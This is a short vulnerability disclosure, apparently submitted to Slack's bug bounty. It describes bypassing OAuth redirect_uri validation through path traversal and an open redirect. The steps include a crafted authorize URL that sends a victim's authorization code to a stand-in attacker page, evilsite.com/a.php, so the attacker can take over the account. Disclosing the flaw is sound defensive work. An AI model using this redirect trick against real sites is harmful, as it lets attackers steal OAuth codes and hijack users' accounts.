Broken Authentication (including Slack OAuth bugs)

Hi, Hope you are doing good! Please have a look at the below report. Description: OAuth Framework Flaw Bypassing redirect_uri validation An attacker to exploit this Flaw just needs to find a open redirection flaw in the site which is using Slack's OAuth for logins. Impact: A malicious user can steal "code" parameter value assigned by Slack OAuth and can hijack victim's account by writing the value in a text file on his evilsite.com/a.php file. Steps to reproduce: 1) Go to any web app which is using Slack's OAuth and click on Login with Slack 2) You will be redirected to this URL https://slack.com/oauth/authorize?client_id=...&scope=read,post&redirect_uri=https://www.givensite.com/../../redirect_url=https://www.evilsite.com/a.php%2Fcomplete Note i am bypassing the redirect_uri validation by using ../../ In the above URL,i have changed the value of redirect_uri to ../../redirect_url=https://www.evilsite.com/a.php and this should not happen. The response will be http://givensite.com/redirect_url=https:/www.evilsite.com/a.php/complete?code=AQCbhUg1FiEQf5TyTesMgjP8zq And then in the final step code value or access_token value will be written in my a.php file,the malicious guy will scrap it from the URL. So,then he can login into the victim account using code value. Please put proper validation on redirect_uri parameter. The redirect_uri value should exactly match as defined in the application and the user to not be allowed to change it to the subdirectories etc. This means if redirect_uri value is https://www.google.com then it should take the value https://www.google.com not https://www.google.com/a/x Looking forward to hear from you, Best regards, Anand